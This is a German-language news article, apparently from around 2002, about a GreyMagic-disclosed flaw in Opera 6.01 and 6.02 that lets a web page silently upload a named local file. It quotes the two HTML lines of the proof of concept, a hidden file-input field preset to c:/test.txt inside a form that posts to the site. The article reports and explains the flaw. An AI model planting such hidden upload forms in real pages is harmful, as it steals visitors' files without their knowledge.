Eine Sicherheitslücke im Opera-Browser für Windows ermöglicht den Zugriff auf Dateien eines Zielsystems. Über das file-Tag für HTML-Formulare kann eine entsprechend präparierte Webseite Daten des Benutzers unbemerkt an den Site-Betreiber verschicken. Betroffen sind die Opera-Versionen 6.01 und 6.02, berichten die Entdecker des Fehlers vom Softwareunternehmen GreyMagic.
Dem Angreifer muss der genaue Name der Zieldatei bekannt sein. So ist zwar kaum Zugriff auf die persönlichen Daten eines Nutzers möglich, dafür allerdings auf verschiedene Files an standardisierten Verzeichnissen, in denen Systeminformationen abgelegt sind. Diese Daten lassen sich für weitergehende Angriffe verwenden.
Zum Upload der Datei wird keine Aktion des Nutzers benötigt. Im HTML-Code der Webseite wird lediglich ein Formular definiert:
<form method="post" enctype="multipart/form-data" action="recFile.php" name="secForm">
Der Zugriff auf eine Datei namens test.txt erfolgt mittels eines Tags zur File-Auswahl, dass per CSS unsichtbar gemacht wird:
<input type="file" name="expFile" value="c:/test.txt" style="visibility:hidden">
Der Fehler ist in der neuen Version Opera 6.03 nicht mehr enthalten. Diese ist allerdings bisher nur auf englisch verfügbar. Nutzer der deutschen Variante sollten daher Opera 6.0 nutzen, in der der Zugriff auf die Dateien ebenfalls nicht funktioniert. Zum Testen des Bugs kann eine Datei namens test.txt mit beliebigem Inhalt im Stammverzeichnis des Laufwerkes c: hinterlegt werden. Klicken Sie anschließend auf den Link zum Exploit von GreyMagic, um den Inhalt ihrer Datei auf den Webseiten des Unternehmens zu betrachten.
Quelle: internet.com
Navigation
Bug im Opera ermöglicht einfachen Zugriff auf Dateien fremder Systeme
Linear-Darstellung
